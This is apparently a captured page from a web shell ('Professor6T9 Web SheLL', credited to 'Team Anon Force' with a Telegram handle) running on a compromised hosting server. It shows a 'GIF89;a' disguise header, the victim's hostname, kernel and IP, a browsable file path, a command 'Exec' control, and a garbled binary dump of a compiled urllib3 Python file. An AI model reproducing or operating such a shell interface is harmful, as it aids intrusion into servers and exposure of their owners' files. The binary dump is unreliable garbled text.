GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python33
/
lib
/
python3.3
/
site-packages
/
pip
/
_vendor
/
requests
/
packages
/
urllib3
/
__pycache__
[ HOME ]
Exec
Submit
fields.cpython-33.pyc
� 7�ReX c @ s] d d l Z d d l Z d d l m Z d d d � Z d d � Z Gd d � d e � Z d S( i Ni ( u sixu application/octet-streamc C s! | r t j | � d p | S| S( u� Guess the "Content-Type" of a file. :param filename: The filename to guess the "Content-Type" of using :mod:`mimetypes`. :param default: If no "Content-Type" can be guessed, default to `default`. i ( u mimetypesu guess_type( u filenameu default( ( uE /tmp/pip-zej_zi-build/pip/_vendor/requests/packages/urllib3/fields.pyu guess_content_type s u guess_content_typec s� t � f d d � d D� � s\ d | � f } y | j d � Wn t k rT Yq\ X| Sn t j sw � j d � � n t j j � d � � d | � f � � S( u� Helper function to format and quote a single header parameter. Particularly useful for header parameters which might contain non-ASCII values, like file names. This follows RFC 2231, as suggested by RFC 2388 Section 4.4. :param name: The name of the parameter, a string expected to be ASCII only. :param value: The value of the parameter, provided as a unicode string. c 3 s | ] } | � k Vq d S( N( ( u .0u ch( u value( uE /tmp/pip-zej_zi-build/pip/_vendor/requests/packages/urllib3/fields.pyu <genexpr>( s u&